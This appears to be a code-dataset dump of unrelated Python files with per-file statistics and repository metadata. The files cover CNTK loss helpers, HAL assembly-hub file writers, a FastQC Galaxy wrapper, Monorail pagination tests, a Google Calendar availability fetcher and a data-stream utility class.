outputs def attention_weight(h_enc, h_dec, inputs_dim): enc = C.layers.Dense(inputs_dim, name='out_start')(h_enc) dec = C.sequence.broadcast_as(C.layers.Dense(inputs_dim, name='out_start')(h_dec), enc) att_weight = C.layers.Dense(1, name='out_start')(C.tanh(enc+dec)) att_weight = C.sequence.softmax(att_weight) return att_weight def all_spans_loss(start_logits, start_y, end_logits, end_y): # this works as follows: # let end_logits be A, B, ..., Y, Z # let start_logits be a, b, ..., y, z # the tricky part is computing log sum (i<=j) exp(start_logits[i] + end_logits[j]) # we break this problem as follows # x = logsumexp(A, B, ..., Y, Z), logsumexp(B, ..., Y, Z), ..., logsumexp(Y, Z), Z # y = a + logsumexp(A, B, ..., Y, Z), b + logsumexp(B, ..., Y, Z), ..., y + logsumexp(Y, Z), z + Z # now if we exponentiate each element in y we have all the terms we need. We just need to sum those exponentials... # logZ = last(sequence.logsumexp(y)) x = C.layers.Recurrence(C.log_add_exp, go_backwards=True, initial_state=-1e+30)(end_logits) y = start_logits + x logZ = C.layers.Fold(C.log_add_exp, initial_state=-1e+30)(y) return logZ - C.sequence.last(C.sequence.gather(start_logits, start_y)) - C.sequence.last(C.sequence.gather(end_logits, end_y)) def seq_hardmax(logits): seq_max = C.layers.Fold(C.element_max, initial_state=C.constant(-1e+30, logits.shape))(logits) s = C.equal(logits, C.sequence.broadcast_as(seq_max, logits)) s_acc = C.layers.Recurrence(C.plus)(s) return s * C.equal(s_acc, 1) # only pick the first one class LambdaFunc(C.ops.functions.UserFunction): def __init__(self, arg, when=lambda arg: True, execute=lambda arg: print((len(arg), arg[0].shape,) if type(arg) == list else (1, arg.shape,), arg), name=''): self.when = when self.execute = execute super(LambdaFunc, self).__init__([arg], name=name) def infer_outputs(self): return [C.output_variable(self.inputs[0].shape, self.inputs[0].dtype, self.inputs[0].dynamic_axes)] def forward(self, argument, device=None, 
outputs_to_retain=None): if self.when(argument): self.execute(argument) return None, argument def backward(self, state, root_gradients): return root_gradients def clone(self, cloned_inputs): return self.__init__(*cloned_inputs) def print_node(v): return C.user_function(LambdaFunc(v))
41.976608
132
0.639454
1,120
7,178
3.891964
0.157143
0.053682
0.041294
0.057811
0.417986
0.333333
0.284698
0.257857
0.219775
0.194999
0
0.009417
0.215938
7,178
171
133
41.976608
0.765103
0.104347
0
0.057143
0
0
0.013035
0
0
0
0
0
0
1
0.214286
false
0
0.042857
0.085714
0.485714
0.028571
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
1
e7dd0fd747c77ccfad30186eb48f1feb9667fdbd
7,400
py
Python
submodules/hal/assemblyHub/prepareHubFiles.py
pbasting/cactus
833d8ca015deecdfa5d0aca01211632cdaca9e58
[ "MIT-0" ]
null
null
null
submodules/hal/assemblyHub/prepareHubFiles.py
pbasting/cactus
833d8ca015deecdfa5d0aca01211632cdaca9e58
[ "MIT-0" ]
null
null
null
submodules/hal/assemblyHub/prepareHubFiles.py
pbasting/cactus
833d8ca015deecdfa5d0aca01211632cdaca9e58
[ "MIT-0" ]
null
null
null
#!/usr/bin/env python #Copyright (C) 2013 by Ngan Nguyen # #Released under the MIT license, see LICENSE.txt """ Make "hub.txt", "groups.txt", files that are required by AssemblyHub Also prepare description.html files """ import os, sys from sonLib.bioio import system from optparse import OptionGroup from hal.assemblyHub.assemblyHubCommon import getProperName from Bio import Phylo from hal.assemblyHub.treeCommon import isBinaryTree def writeDescriptionFile(genome, outdir): filename = os.path.join(outdir, "description.html") f = open(filename, 'w') f.write("%s\n" %genome) f.close() return def writeTrackDb_composite_html(file, treeFile): f = open(file, 'w') #HACK: #huburl = "http://hgwdev.cse.ucsc.edu/~nknguyen/ecoli/hub/TEST2" huburl = "http://hgwdev.cse.ucsc.edu/~nknguyen/birds/birds2" basename = os.path.basename(treeFile) f.write("<img src=\"%s/%s\">\n" %(huburl, basename)) f.close() def writeTrackDb_compositeStart(f, shortLabel, longLabel, bbdirs, bwdirs, genomes, properName, url, img): #Composite track includes all annotations in BED & WIGGLE formats, their lifted-over tracks, and Snake tracks f.write("track hubCentral\n") f.write("compositeTrack on\n") f.write("shortLabel %s\n" %shortLabel) f.write("longLabel %s\n" %longLabel) f.write("group comphub\n") bedtracktypes = [os.path.basename(b.rstrip('/')) for b in bbdirs] bedstr = " ".join(["%s=%s" %(item, item) for item in bedtracktypes]) wigtracktypes = [os.path.basename(b.rstrip('/')) for b in bwdirs] wigstr = " ".join(["%s=%s" %(item, item) for item in wigtracktypes]) f.write("subGroup1 view Track_Type Snake=Alignments %s %s\n" %(bedstr, wigstr)) genomeStr = " ".join(["%s=%s" %(g, getProperName(g, properName)) for g in genomes]) f.write("subGroup2 orgs Organisms %s\n" %genomeStr) f.write("dragAndDrop subTracks\n") f.write("#allButtonPair on\n") #f.write("sortOrder view=+ orgs=+\n") f.write("dimensions dimensionX=view dimensionY=orgs\n") f.write("noInherit on\n") f.write("priority 0\n") f.write("centerLabelsDense 
on\n") f.write("visibility full\n") f.write("html ../documentation/hubCentral\n") if url and img: imgurl = os.path.join(url, os.path.basename(img)) f.write("treeImage %s\n" %imgurl) f.write("type bigBed 3\n") f.write("\n") def writeTrackDb_compositeSubTrack(f, name, visibility): f.write("\ttrack hubCentral%s\n" %name) f.write("\tshortLabel %s\n" %name) f.write("\tview %s\n" %name) f.write("\tvisibility %s\n" %visibility) f.write("\tsubTrack hubCentral\n") f.write("\n") def writeGroupFile(outdir, hubLabel, annotations): filename = os.path.join(outdir, "groups.txt") f = open(filename, 'w') f.write("name user\n") f.write("label Custom\n") f.write("priority 1\n") f.write("defaultIsClosed 1\n") f.write("\n") f.write("name map\n") f.write("label Mapping\n") f.write("priority 2\n") f.write("defaultIsClosed 0\n") f.write("\n") f.write("name comphub\n") f.write("label %s\n" % hubLabel) f.write("priority 3\n") f.write("defaultIsClosed 0\n") f.write("\n") f.write("name snake\n") f.write("label Alignment Snakes\n") f.write("priority 3\n") f.write("defaultIsClosed 0\n") f.write("\n") for annotation in annotations: f.write("name annotation%s\n" %annotation) f.write("label %s Annotations\n" % annotation.capitalize() ) f.write("priority 3\n") f.write("defaultIsClosed 1\n") f.write("\n") f.write("name exp\n") f.write("label Experimental\n") f.write("priority 4\n") f.write("defaultIsClosed 1\n") f.write("\n") f.close() def writeHubFile(outdir, options): hubfile = os.path.join(outdir, "hub.txt") f = open(hubfile, "w") f.write("hub %s\n" %options.hubLabel) f.write("shortLabel %s\n" %options.shortLabel) f.write("longLabel %s\n" %options.longLabel) f.write("genomesFile genomes.txt\n") f.write("email %s\n" %options.email) f.close() #=========== READ FILES =========== def readList(file): items = [] f = open(file, 'r') for line in f: items.append(line.strip()) f.close() return items def readRename(file): name2new = {} f = open(file, 'r') for line in f: line = line.strip() if len(line) == 0 
or line[0] == "#": continue items = line.split('\t') if len(items) >=2: name2new[items[0]] = items[1] f.close() return name2new #=========== OPTIONS ============= def addHubOptions(parser): group = OptionGroup(parser, "HUB INFORMATION") group.add_option('--hub', dest='hubLabel', default='myHub', help='a single-word name of the directory containing the track hub files. Not displayed to hub users. Default=%default') group.add_option('--shortLabel', dest='shortLabel', default='my hub', help='the short name for the track hub. Suggested maximum length is 17 characters. Displayed as the hub name on the Track Hubs page and the track group name on the browser tracks page. Default=%default') group.add_option('--longLabel', dest='longLabel', default='my hub', help='a longer descriptive label for the track hub. Suggested maximum length is 80 characters. Displayed in the description field on the Track Hubs page. Default=%default') group.add_option('--email', dest='email', default='NoEmail', help='the contact to whom questions regarding the track hub should be directed. Default=%default') group.add_option('--genomes', dest='genomes', help='File specified list of genomes to make browser for. If specified, only create browsers for these genomes in the order provided by the list. Otherwise create browsers for all genomes in the input hal file') group.add_option('--rename', dest='rename', help='File that maps halfile genomeNames to names displayed on the browser. Format: <halGenomeName>\\t<genomeNameToDisplayOnBrowser>. Default=%default') group.add_option('--tree', dest='treeFile', help='Newick binary tree. The order of the tracks and the default track layout will be based on this tree if option "genomes" is not specified. If not specified, try to extract the newick tree from the input halfile.') group.add_option('--url', dest='url', help='Public url of the hub location') group.add_option('--twobitdir', dest='twobitdir', help='Optional. 
Directory containing the 2bit files of each genomes. Default: extract from the input hal file.') parser.add_option_group(group) def checkHubOptions(parser, options): if options.genomes: options.genomes = readList(options.genomes) options.properName = {} if options.rename and os.path.exists(options.rename): options.properName = readRename(options.rename) options.treeFig = None options.leaves = None options.tree = None if options.treeFile and not os.path.exists(options.treeFile): parser.error("The tree file %s does not exist.\n" %options.tree) elif options.treeFile: tree = Phylo.read(options.treeFile, 'newick') if isBinaryTree(tree): options.tree = tree else: sys.stderr.write("Warnning: tree %s is not a binary tree. Will be ignored!" %options.treeFile)
40.217391
277
0.662027
1,040
7,400
4.695192
0.263462
0.076183
0.054475
0.013107
0.199058
0.146222
0.113864
0.099939
0.052632
0.052632
0
0.00582
0.187297
7,400
183
278
40.437158
0.806119
0.065811
0
0.202797
0
0.041958
0.373169
0.011313
0
0
0
0
0
1
0.06993
false
0
0.041958
0
0.132867
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
e7defab092a8c6a31ee2f6d14dfbb7eb3596456d
475
py
Python
src/sqlfluff/core/__init__.py
pvonglehn/sqlfluff
61eb251ee96b1b70aa477f3a2f2b9c351a04c1e8
[ "MIT" ]
null
null
null
src/sqlfluff/core/__init__.py
pvonglehn/sqlfluff
61eb251ee96b1b70aa477f3a2f2b9c351a04c1e8
[ "MIT" ]
null
null
null
src/sqlfluff/core/__init__.py
pvonglehn/sqlfluff
61eb251ee96b1b70aa477f3a2f2b9c351a04c1e8
[ "MIT" ]
1
2021-03-07T21:49:52.000Z
2021-03-07T21:49:52.000Z
"""The core elements of sqlfluff.""" # flake8: noqa: F401 # Config objects from sqlfluff.core.config import FluffConfig # Public classes from sqlfluff.core.linter import Linter from sqlfluff.core.parser import Lexer, Parser # Dialect introspection from sqlfluff.core.dialects import dialect_selector, dialect_readout # All of the errors. from sqlfluff.core.errors import ( SQLBaseError, SQLTemplaterError, SQLLexError, SQLParseError, SQLLintError, )
20.652174
68
0.768421
56
475
6.482143
0.535714
0.165289
0.220386
0
0
0
0
0
0
0
0
0.010025
0.16
475
22
69
21.590909
0.899749
0.254737
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
0.454545
0
0.454545
0
0
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
0
0
0
3
e7e190c401cd34896ce2b8d4d09a1b734e5c48e3
6,698
py
Python
tools/fastqc/rgFastQC.py
bebatut/tools-iuc
4fb528145289ad4db04e4589c02e9ddaa1194138
[ "MIT" ]
null
null
null
tools/fastqc/rgFastQC.py
bebatut/tools-iuc
4fb528145289ad4db04e4589c02e9ddaa1194138
[ "MIT" ]
null
null
null
tools/fastqc/rgFastQC.py
bebatut/tools-iuc
4fb528145289ad4db04e4589c02e9ddaa1194138
[ "MIT" ]
null
null
null
""" Rewrite of rgFastQC.py for Version 0.11.2 of FastQC. Changes implemented from tmcgowan at https://testtoolshed.g2.bx.psu.edu/view/tmcgowan/fastqc and iuc at https://toolshed.g2.bx.psu.edu/view/iuc/fastqc with minor changes and bug fixes SYNOPSIS rgFastQC.py -i input_file -j input_file.name -o output_html_file [-d output_directory] [-f fastq|bam|sam] [-n job_name] [-c contaminant_file] [-e fastqc_executable] EXAMPLE (generated by Galaxy) rgFastQC.py -i path/dataset_1.dat -j 1000gsample.fastq -o path/dataset_3.dat -d path/job_working_directory/subfolder -f fastq -n FastQC -c path/dataset_2.dat -e fastqc """ import bz2 import glob import gzip import mimetypes import optparse import os import re import shutil import subprocess import tempfile import zipfile class FastQCRunner(object): def __init__(self, opts=None): ''' Initializes an object to run FastQC in Galaxy. To start the process, use the function run_fastqc() ''' # Check whether the options are specified and saves them into the object assert opts is not None self.opts = opts def prepare_command_line(self): ''' Develops the Commandline to run FastQC in Galaxy ''' # Check whether a given file compression format is valid # This prevents uncompression of already uncompressed files infname = self.opts.inputfilename linf = infname.lower() informat = self.opts.informat trimext = False # decompression at upload currently does NOT remove this now bogus ending - fastqc will barf # patched may 29 2013 until this is fixed properly ftype = mimetypes.guess_type(self.opts.input) if linf.endswith('.gz') or linf.endswith('.gzip') or ftype[-1] == "gzip" or informat.endswith('.gz'): f = gzip.open(self.opts.input) try: f.readline() ftype = ['gzip'] except Exception: trimext = True f.close() elif linf.endswith('bz2') or informat.endswith('.bz2'): f = bz2.BZ2File(self.opts.input, 'r') try: ftype = ['bzip2'] f.readline() except Exception: trimext = True f.close() elif linf.endswith('.zip'): if not 
zipfile.is_zipfile(self.opts.input): trimext = True if trimext: f = open(self.opts.input) try: f.readline() except Exception: raise Exception("Input file corruption, could not identify the filetype") infname = os.path.splitext(infname)[0] # Replace unwanted or problematic charaters in the input file name self.fastqinfilename = re.sub(r'[^a-zA-Z0-9_\-\.]', '_', os.path.basename(infname)) # check that the symbolic link gets a proper ending, fastqc seems to ignore the given format otherwise if 'fastq' in self.opts.informat: # with fastq the .ext is ignored, but when a format is actually passed it must comply with fastqc's # accepted formats.. self.opts.informat = 'fastq' elif not self.fastqinfilename.endswith(self.opts.informat): self.fastqinfilename += '.%s' % self.opts.informat # Build the Commandline from the given parameters command_line = [opts.executable, '--outdir %s' % self.opts.outputdir] if self.opts.contaminants is not None: command_line.append('--contaminants %s' % self.opts.contaminants) if self.opts.limits is not None: command_line.append('--limits %s' % self.opts.limits) command_line.append('--quiet') command_line.append('--extract') # to access the output text file if ftype[-1] == 'gzip': self.fastqinfilename += '.gz' elif ftype[-1] == 'bzip2': self.fastqinfilename += '.bz2' else: command_line.append('-f %s' % self.opts.informat) command_line.append(self.fastqinfilename) self.command_line = ' '.join(command_line) def copy_output_file_to_dataset(self): ''' Retrieves the output html and text files from the output directory and copies them to the Galaxy output files ''' # retrieve html file result_file = glob.glob(self.opts.outputdir + '/*html') with open(result_file[0], 'rb') as fsrc: with open(self.opts.htmloutput, 'wb') as fdest: shutil.copyfileobj(fsrc, fdest) # retrieve text file text_file = glob.glob(self.opts.outputdir + '/*/fastqc_data.txt') with open(text_file[0], 'rb') as fsrc: with open(self.opts.textoutput, 'wb') as fdest: 
shutil.copyfileobj(fsrc, fdest) def run_fastqc(self): ''' Executes FastQC. Make sure the mandatory import parameters input, inputfilename, outputdir and htmloutput have been specified in the options ''' # Create a log file dummy, tlog = tempfile.mkstemp(prefix='rgFastQC', suffix=".log", dir=self.opts.outputdir) sout = open(tlog, 'w') self.prepare_command_line() sout.write(self.command_line) sout.write('\n') sout.write("Creating symlink\n") # between the input (.dat) file and the given input file name os.symlink(self.opts.input, self.fastqinfilename) sout.write("check_call\n") subprocess.check_call(self.command_line, shell=True) sout.write("Copying working %s file to %s \n" % (self.fastqinfilename, self.opts.htmloutput)) self.copy_output_file_to_dataset() sout.write("Finished") sout.close() if __name__ == '__main__': op = optparse.OptionParser() op.add_option('-i', '--input', default=None) op.add_option('-j', '--inputfilename', default=None) op.add_option('-o', '--htmloutput', default=None) op.add_option('-t', '--textoutput', default=None) op.add_option('-d', '--outputdir', default="/tmp/shortread") op.add_option('-f', '--informat', default='fastq') op.add_option('-n', '--namejob', default='rgFastQC') op.add_option('-c', '--contaminants', default=None) op.add_option('-l', '--limits', default=None) op.add_option('-e', '--executable', default='fastqc') opts, args = op.parse_args() assert opts.input is not None assert opts.inputfilename is not None assert opts.htmloutput is not None if not os.path.exists(opts.outputdir): os.makedirs(opts.outputdir) fastqc_runner = FastQCRunner(opts) fastqc_runner.run_fastqc()
39.169591
148
0.627351
853
6,698
4.838218
0.311841
0.0504
0.026654
0.023261
0.163315
0.094984
0.068331
0.037315
0.037315
0
0
0.007049
0.258734
6,698
170
149
39.4
0.824169
0.27456
0
0.145455
0
0
0.102424
0
0
0
0
0
0.036364
1
0.036364
false
0
0.1
0
0.145455
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99adaa9fbb76e38861e85eb3688d0298edfd1677
5,563
py
Python
appengine/monorail/framework/test/paginate_test.py
allaparthi/monorail
e18645fc1b952a5a6ff5f06e0c740d75f1904473
[ "BSD-3-Clause" ]
null
null
null
appengine/monorail/framework/test/paginate_test.py
allaparthi/monorail
e18645fc1b952a5a6ff5f06e0c740d75f1904473
[ "BSD-3-Clause" ]
7
2022-02-15T01:11:37.000Z
2022-03-02T12:46:13.000Z
appengine/monorail/framework/test/paginate_test.py
allaparthi/monorail
e18645fc1b952a5a6ff5f06e0c740d75f1904473
[ "BSD-3-Clause" ]
null
null
null
# Copyright 2016 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style # license that can be found in the LICENSE file or at # https://developers.google.com/open-source/licenses/bsd """Unit tests for pagination classes.""" from __future__ import print_function from __future__ import division from __future__ import absolute_import import unittest from google.appengine.ext import testbed from framework import exceptions from framework import paginate from testing import testing_helpers from proto import secrets_pb2 class PageTokenTest(unittest.TestCase): def setUp(self): self.testbed = testbed.Testbed() self.testbed.activate() self.testbed.init_memcache_stub() self.testbed.init_datastore_v3_stub() def testGeneratePageToken_DiffRequests(self): request_cont_1 = secrets_pb2.ListRequestContents( parent='same', page_size=1, order_by='same', query='same') request_cont_2 = secrets_pb2.ListRequestContents( parent='same', page_size=2, order_by='same', query='same') start = 10 self.assertNotEqual( paginate.GeneratePageToken(request_cont_1, start), paginate.GeneratePageToken(request_cont_2, start)) def testValidateAndParsePageToken(self): request_cont_1 = secrets_pb2.ListRequestContents( parent='projects/chicken', page_size=1, order_by='boks', query='hay') start = 2 token = paginate.GeneratePageToken(request_cont_1, start) self.assertEqual( start, paginate.ValidateAndParsePageToken(token, request_cont_1)) def testValidateAndParsePageToken_InvalidContents(self): request_cont_1 = secrets_pb2.ListRequestContents( parent='projects/chicken', page_size=1, order_by='boks', query='hay') start = 2 token = paginate.GeneratePageToken(request_cont_1, start) request_cont_diff = secrets_pb2.ListRequestContents( parent='projects/goose', page_size=1, order_by='boks', query='hay') with self.assertRaises(exceptions.PageTokenException): paginate.ValidateAndParsePageToken(token, request_cont_diff) def 
testValidateAndParsePageToken_InvalidSerializedToken(self): request_cont = secrets_pb2.ListRequestContents() with self.assertRaises(exceptions.PageTokenException): paginate.ValidateAndParsePageToken('sldkfj87', request_cont) def testValidateAndParsePageToken_InvalidTokenFormat(self): request_cont = secrets_pb2.ListRequestContents() with self.assertRaises(exceptions.PageTokenException): paginate.ValidateAndParsePageToken('///sldkfj87', request_cont) class PaginateTest(unittest.TestCase): def testVirtualPagination(self): # Paginating 0 results on a page that can hold 100. mr = testing_helpers.MakeMonorailRequest(path='/issues/list') total_count = 0 items_per_page = 100 start = 0 vp = paginate.VirtualPagination(total_count, items_per_page, start) self.assertEqual(vp.num, 100) self.assertEqual(vp.start, 1) self.assertEqual(vp.last, 0) self.assertFalse(vp.visible) # Paginating 12 results on a page that can hold 100. mr = testing_helpers.MakeMonorailRequest(path='/issues/list') vp = paginate.VirtualPagination(12, 100, 0) self.assertEqual(vp.num, 100) self.assertEqual(vp.start, 1) self.assertEqual(vp.last, 12) self.assertTrue(vp.visible) # Paginating 12 results on a page that can hold 10. mr = testing_helpers.MakeMonorailRequest(path='/issues/list?num=10') vp = paginate.VirtualPagination(12, 10, 0) self.assertEqual(vp.num, 10) self.assertEqual(vp.start, 1) self.assertEqual(vp.last, 10) self.assertTrue(vp.visible) # Paginating 12 results starting at 5 on page that can hold 10. mr = testing_helpers.MakeMonorailRequest( path='/issues/list?start=5&num=10') vp = paginate.VirtualPagination(12, 10, 5) self.assertEqual(vp.num, 10) self.assertEqual(vp.start, 6) self.assertEqual(vp.last, 12) self.assertTrue(vp.visible) # Paginating 123 results on a page that can hold 100. 
mr = testing_helpers.MakeMonorailRequest(path='/issues/list') vp = paginate.VirtualPagination(123, 100, 0) self.assertEqual(vp.num, 100) self.assertEqual(vp.start, 1) self.assertEqual(vp.last, 100) self.assertTrue(vp.visible) # Paginating 123 results on second page that can hold 100. mr = testing_helpers.MakeMonorailRequest(path='/issues/list?start=100') vp = paginate.VirtualPagination(123, 100, 100) self.assertEqual(vp.num, 100) self.assertEqual(vp.start, 101) self.assertEqual(vp.last, 123) self.assertTrue(vp.visible) # Paginating a huge number of objects will show at most 1000 per page. mr = testing_helpers.MakeMonorailRequest(path='/issues/list?num=9999') vp = paginate.VirtualPagination(12345, 9999, 0) self.assertEqual(vp.num, 1000) self.assertEqual(vp.start, 1) self.assertEqual(vp.last, 1000) self.assertTrue(vp.visible) # Test urls for a hotlist pagination mr = testing_helpers.MakeMonorailRequest( path='/u/hotlists/17?num=5&start=4') mr.hotlist_id = 17 mr.auth.user_id = 112 vp = paginate.VirtualPagination(12, 5, 4, list_page_url='/u/112/hotlists/17') self.assertEqual(vp.num, 5) self.assertEqual(vp.start, 5) self.assertEqual(vp.last, 9) self.assertTrue(vp.visible) self.assertEqual('/u/112/hotlists/17?num=5&start=9', vp.next_url) self.assertEqual('/u/112/hotlists/17?num=5&start=0', vp.prev_url)
38.10274
77
0.729642
707
5,563
5.61669
0.224894
0.101989
0.102745
0.070511
0.618736
0.543692
0.533115
0.469907
0.421556
0.352304
0
0.045033
0.165738
5,563
145
78
38.365517
0.810601
0.121697
0
0.357798
0
0
0.070856
0.033272
0
0
0
0
0.357798
1
0.06422
false
0
0.082569
0
0.165138
0.009174
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99addb00927f314ffddb52609797a63c1bd4e073
4,022
py
Python
backend/google_calendar.py
engineerjoe440/djjoecalendar
02e88861d460d71527bf5d714913fd148579b258
[ "MIT" ]
null
null
null
backend/google_calendar.py
engineerjoe440/djjoecalendar
02e88861d460d71527bf5d714913fd148579b258
[ "MIT" ]
null
null
null
backend/google_calendar.py
engineerjoe440/djjoecalendar
02e88861d460d71527bf5d714913fd148579b258
[ "MIT" ]
null
null
null
################################################################################ """ DJ JOE Website Availability Calendar ------------------------------------ (c) 2021 - Stanley Solutions - Joe Stanley This application serves the React frontend required to demonstrate the available dates for DJ Joe Services. """ ################################################################################ # Import Requisites import os import datetime import requests from date_support import daterange, _clean_dates, _restore_datetimes ENV_API_KEY = "GOOGLE_API_KEY" BASE_URL = ( "https://clients6.google.com/calendar/v3/calendars/engineerjoe440@gmail.com" "/events?calendarId=engineerjoe440%40gmail.com&singleEvents=true&timeZone=" "America%2FLos_Angeles&maxAttendees=1&maxResults=250&sanitizeHtml=true&" "timeMin={TIME_MIN}&timeMax={TIME_MAX}&key={API_KEY}" ) ################################################################################ # Supporting Functions def googlify_datetimes(dts): dts = _restore_datetimes(_clean_dates(dts)) return [dt.isoformat()+"Z" for dt in dts] def get_google_date(google_dt_dict): """Performs dictionary-specific handling to attempt extraction of dt.""" google_dt = google_dt_dict.get('dateTime', google_dt_dict.get('date')) return google_dt.split("T")[0] def get_google_time(google_dt_dict): """Performs dictionary-specific handling to attempt extraction of dt.""" google_dt = google_dt_dict.get('dateTime', google_dt_dict.get('date')) try: timestring = google_dt.split("T")[1].split('-')[0] except IndexError: timestring = "00:00:00" return timestring ################################################################################ # Event Listing Functions def get_event_list(start: datetime.datetime, end: datetime.datetime): """Identifies a list of all events in the specified date range.""" start, end = googlify_datetimes([start, end]) # Call the Calendar API REQ_URL = BASE_URL.format( TIME_MIN = start, TIME_MAX = end, API_KEY = os.getenv(ENV_API_KEY), ) 
print(REQ_URL) resp = requests.get(REQ_URL) if resp.status_code == 200: return resp.json().get('items', []) else: print( "GOOGLE REQUEST FAILED:", resp.status_code, resp.reason, ) return [] def get_occupied_dates(start: datetime.datetime, end: datetime.datetime): """Generates a list of single dt objects representing occupied dates.""" events = get_event_list(start=start, end=end) occupied_dates = [] # Iteratively process each event for event in events: start_date = datetime.datetime.strptime( get_google_date(event['start']), "%Y-%m-%d", ) end = event.get('end') if end != None: end_date = get_google_date(end) end_time = datetime.datetime.strptime(get_google_time(end), "%H:%M:%S") if end_date != None and end_time.hour != 0: end_date = datetime.datetime.strptime(end_date, "%Y-%m-%d") for date in daterange(start_date, end_date): # Append all dates in range occupied_dates.append(date) else: # Append only start date occupied_dates.append(start_date) else: # Append only start date occupied_dates.append(start_date) return occupied_dates if __name__ == '__main__': now = datetime.datetime.now() - datetime.timedelta(days=20) events = get_event_list(now, now + datetime.timedelta(days=30)) for event in events: print(event['start'].get('dateTime', event['start'].get('date'))) if len(events) == 0: print("NO EVENTS FOUND") events = get_occupied_dates(now, now + datetime.timedelta(days=30)) for event in events: print("event", event) if len(events) == 0: print("NO EVENTS FOUND")
34.973913
83
0.592491
470
4,022
4.876596
0.314894
0.034904
0.031414
0.026178
0.287958
0.259162
0.224258
0.224258
0.19808
0.19808
0
0.012662
0.21457
4,022
115
84
34.973913
0.712884
0.168324
0
0.186667
0
0
0.147777
0.064861
0
0
0
0
0
1
0.066667
false
0
0.053333
0
0.2
0.08
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99aff1381f53e0fd438acad0daa71781fe93be07
5,764
py
Python
seutil/Stream.py
JiyangZhang/seutil
6a2d0961a5f78f2adbf9f0b5f292f6be71780ca2
[ "Apache-2.0" ]
6
2020-07-02T02:39:59.000Z
2022-02-08T18:38:39.000Z
seutil/Stream.py
JiyangZhang/seutil
6a2d0961a5f78f2adbf9f0b5f292f6be71780ca2
[ "Apache-2.0" ]
5
2020-11-29T02:26:50.000Z
2022-01-24T16:26:54.000Z
seutil/Stream.py
JiyangZhang/seutil
6a2d0961a5f78f2adbf9f0b5f292f6be71780ca2
[ "Apache-2.0" ]
1
2020-10-09T23:31:22.000Z
2020-10-09T23:31:22.000Z
from pathlib import Path import numpy as np import random import subprocess from typing import * from .IOUtils import IOUtils class Stream: """ Streams help manipulate sequences of objects. """ def __init__(self): self.items = list() return @classmethod def of(cls, one_or_more_items): """ Get a new stream from the item / items. :param one_or_more_items: is converted to list with builtin `list` function. """ stream = Stream() if one_or_more_items is not None: stream.items = list(one_or_more_items) # end if, if return stream @classmethod def of_files(cls, dir_path: Union[str, Path]): """ Get a stream of the files under the directory. """ with IOUtils.cd(dir_path): cmd_find = "find -mindepth 1 -maxdepth 1 -type f" files = subprocess.run(["bash","-c",cmd_find], stdout=subprocess.PIPE).stdout.decode("utf-8").split("\n")[:-1] # end with files = [file[2:] for file in files] stream = cls.of(files) stream.sorted() return stream @classmethod def of_dirs(cls, dir_path: Union[str, Path]): """ Get a stream of the sub-directories under the directory. """ with IOUtils.cd(dir_path): cmd_find = "find -mindepth 1 -maxdepth 1 -type d" dirs = subprocess.run(["bash","-c",cmd_find], stdout=subprocess.PIPE).stdout.decode("utf-8").split("\n")[:-1] # end with dirs = [dir[2:] for dir in dirs] stream = cls.of(dirs) stream.sorted() return stream def filter(self, predicate_func: Callable[[object], bool]): """ Returns a stream consisting of the elements of this stream that match the given predicate. """ return Stream.of(item for item in self.items if predicate_func(item)) def count(self): return sum(self.items) def reduce(self, count_func: Callable[[str], float] = lambda x: 1): return sum([count_func(f) for f in self.items]) def sorted(self, key: Callable[[str], object] = lambda f: f, reverse: bool = False): """ Sorts the list of files in the dataset. 
""" list.sort(self.items, key=key, reverse=reverse) return self def map(self, map_func: Callable[[str], object], errors: str = "raise", default: object = ""): def new_items_generator(): for item in self.items: try: new_item = map_func(item) except: if errors == "ignore": yield default else: raise else: yield new_item # end for # end def return Stream.of(new_items_generator()) def peak(self, peak_func: Callable[[str], None], errors: str = "ignore"): for item in self.items: try: peak_func(item) except: if errors == "ignore": continue else: raise # end for return self def split(self, fraction_list: List[float], count_func: Callable[[str], float] = lambda x: 1): """ Splits the dataset as each part specified by the fractions (assumed to sum up to 1). Splitting is done by finding the cutting points. If randomization is needed, call shuffle first. :param count_func: customize the number of data counts in each file. """ if self.is_empty(): return tuple(Stream() for i in range(len(fraction_list))) count_list = [count_func(f) for f in self.items] cum_count_list = np.cumsum(count_list) cum_expected_count_list = [f * cum_count_list[-1] for f in np.cumsum(fraction_list)] cut_index_list = [] last_i = 0 for i, cum_count in enumerate(cum_count_list): if cum_count >= cum_expected_count_list[len(cut_index_list)]: last_i = i+1 cut_index_list.append(i+1) if len(cut_index_list) >= len(cum_expected_count_list): break # end if # end for if if last_i != len(cum_count_list): cut_index_list.append(len(cum_count_list)) # end if cut_index_list.insert(0,0) return tuple(Stream.of(self.items[cut_index_list[i]:cut_index_list[i + 1]]) for i in range(len(cut_index_list) - 1)) def shuffle(self, seed=None): """ Shuffles the list of files in the dataset. 
""" random.seed(seed) random.shuffle(self.items) return self def get(self, index: int): return self.items[index] def is_empty(self): return len(self.items) == 0 def __getitem__(self, item): new_items = self.items.__getitem__(item) if not isinstance(item, slice): new_items = [new_items] return Stream.of(new_items) def __setitem__(self, key, value): return self.items.__setitem__(key, value) def __delitem__(self, key): return self.items.__delitem__(key) def __iter__(self): return self.items.__iter__() def __len__(self): return self.items.__len__() def __str__(self): return "Stream with {} items".format(len(self.items)) def __repr__(self): return self.__str__() def __add__(self, other): if isinstance(other, Stream): return Stream.of(self.items+other.items) else: raise NotImplementedError
32.022222
124
0.566967
733
5,764
4.251023
0.231924
0.054878
0.03466
0.017972
0.270218
0.202182
0.170732
0.154044
0.116816
0.116816
0
0.005704
0.330847
5,764
179
125
32.201117
0.802178
0.133588
0
0.228814
0
0
